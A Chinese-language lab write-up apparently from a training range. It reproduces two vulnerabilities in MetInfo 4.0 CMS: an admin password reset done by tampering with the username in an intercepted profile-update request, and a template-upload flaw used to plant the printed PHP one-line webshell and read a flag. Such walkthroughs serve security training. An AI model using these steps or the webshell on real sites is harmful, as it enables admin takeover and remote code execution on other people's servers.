在线靶场
可以通过访问极核官方靶场开启靶机实验:极核靶场 -> 漏洞复现靶场 -> MetInfo 4.0
简介
MetInfo是一个开源的CMS程序,4.0版本存在任意用户密码重置以及文件上传
的漏洞。
漏洞复现
任意用户密码重置
打开网站首页,然后访问robots.txt
文件,获取关键信息:
- 管理员后台:
/admin/
- 用户登录:
/member/
打开用户登录界面,注册一个账号后并且登录
登录上刚才注册的账号,然后点击修改基本信息,输入任意的密码,然后打开BurpSuite抓包软件后,点击提交信息,抓取数据包。
然后将数据包中的test(你自己注册的用户名)改为admin(管理员用户名),然后放行数据包,这样就完成了修改了admin用户(管理员账号)的密码。
访问管理员后台,输入账号:admin / 你修改的密码,成功进入后台!
文件上传漏洞
准备一个一句话木马:<?php eval($_POST["cmd"]); ?>
,然后重命名为shell.php
,然后将shell.php压缩为shell.zip
进入网站后台 -> 界面风格 -> 模板管理
,找到添加新模板,上传刚才制作的shell.zip
压缩包。
上传后会自动将压缩包里面的shell.php
文件解压到网站的/templates/
目录下,也就是说现在只需要访问url/templates/shell.php
即可访问到我们上传的一句话木马了。
权限获取
使用蚁剑进行连接测试,发现可以连接刚才上传的一句话木马,连接后进入页面。
访问根目录 /
,即可看到flag
文件!至此已成功拿下靶机!
THE END
- 最新
- 最热
只看作者